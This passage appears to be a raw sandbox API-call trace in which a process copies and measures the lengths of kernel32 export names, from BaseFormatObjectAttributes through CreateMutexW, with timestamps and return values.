lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.893] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.893] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.893] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.893] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.893] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.893] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.893] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.893] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.893] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.894] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.894] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.894] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.894] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.894] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.894] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.894] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.894] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.894] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.894] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.894] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.894] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.894] lstrlenA (lpString="BEEP") returned 4 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.894] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.894] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.894] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.894] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.894] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.894] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.895] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.895] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.895] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.895] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.895] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.895] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.895] lstrlenA (lpString="CANCELIO") returned 8 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.895] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.895] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.895] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.895] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.895] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.895] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.895] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.895] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.895] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.895] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.895] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.895] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.895] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.896] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.896] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.896] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.896] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.896] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.896] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.896] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.896] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.896] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.896] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.896] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.896] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.896] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.896] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.896] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.896] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.896] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.896] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.896] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.897] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.897] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.897] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.897] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.897] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.897] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.897] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.897] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.897] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.897] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.897] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.897] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.897] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.897] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.897] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.897] lstrlenA (lpString="COPYFILEA") returned 9 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.897] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.897] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.897] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.897] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.898] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.898] lstrlenA (lpString="COPYFILEW") returned 9 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.898] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.898] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.898] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.898] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.898] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.898] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.898] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.898] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.898] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.898] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.898] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.898] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.898] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.898] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.898] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.898] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.898] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.898] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.899] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.899] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.899] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.899] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.899] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.899] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.899] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.899] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.899] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.899] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.899] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.899] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.899] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.899] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.899] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.899] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.899] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.899] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.899] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.899] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.900] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.900] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.900] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.900] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.900] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.900] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.900] 